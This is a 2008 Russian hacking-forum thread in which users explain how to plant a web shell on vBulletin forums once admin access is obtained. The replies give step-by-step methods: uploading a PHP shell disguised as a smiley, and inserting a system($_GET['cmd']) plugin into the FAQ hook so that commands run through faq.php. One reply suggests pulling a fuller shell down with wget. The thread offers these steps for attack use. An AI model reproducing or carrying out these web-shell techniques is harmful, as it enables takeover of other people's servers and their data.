Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Как Залить шелл в Vbulletin 3.6.7? (https://forum.antichat.xyz/showthread.php?t=87353)

jason-z 03.10.2008 21:14
Как Залить шелл в Vbulletin 3.6.7?
 
собсно, сабж.

.AkeLLa 03.10.2008 21:19
Берешь булку, отгрызаешь кусок, передовываешь, глотаешь. Хек!

jason-z 03.10.2008 22:26
Цитата:
Сообщение от .AkeLLa
Берешь булку, отгрызаешь кусок, передовываешь, глотаешь. Хек!
Это подходит, но у меня есть доступ в админку :D

~!DoK_tOR!~ 04.10.2008 12:02
vBulletin 2.*.* & 3.0.*

1. Заходим в админку.
2. Смайлы.
3. Загрузить смайл.
4. Грузим наш шелл. (папка по умолчанию /images/smilies)
5. Заходим www.xz.сom/forumpath/images/smilies/shell.php
Примечание: сработает не везде.



vBulletin 3.5.*.

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

(c) ettee

ultimatum 04.10.2008 14:35
У админов разные права , если ты даже админ на булке , это не говорит о том что ты имеешь права менять шаблоны или продукты.

Дюша 04.10.2008 15:15
Цитата:
Сообщение от ~!DoK_tOR!~
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

в версии 3.6.7 не пробывал возможно сработает .
ога и + wget + народ + расширение пхп

jason-z 04.10.2008 21:20
Цитата:
Сообщение от ~!DoK_tOR!~

vBulletin 3.5.*.

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"
);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

(c) ettee
модуль сохранился, но при заходе на "forumpath/faq.php?cmd=тут команда" открывается окно с поиском по справке и все (

jason-z 04.10.2008 21:22
Цитата:
Сообщение от Дюша
ога и + wget + народ + расширение пхп
Дюша, а что это значит?

Дюша 04.10.2008 21:26
1 ступень готова т.е...
vBulletin 3.5.*.

Цитата:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"
);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
дальше лей шелл командами

jason-z 06.10.2008 18:06
Цитата:
Сообщение от Дюша
1 ступень готова т.е...
vBulletin 3.5.*.


дальше лей шелл командами
Не канает.


Время: 03:29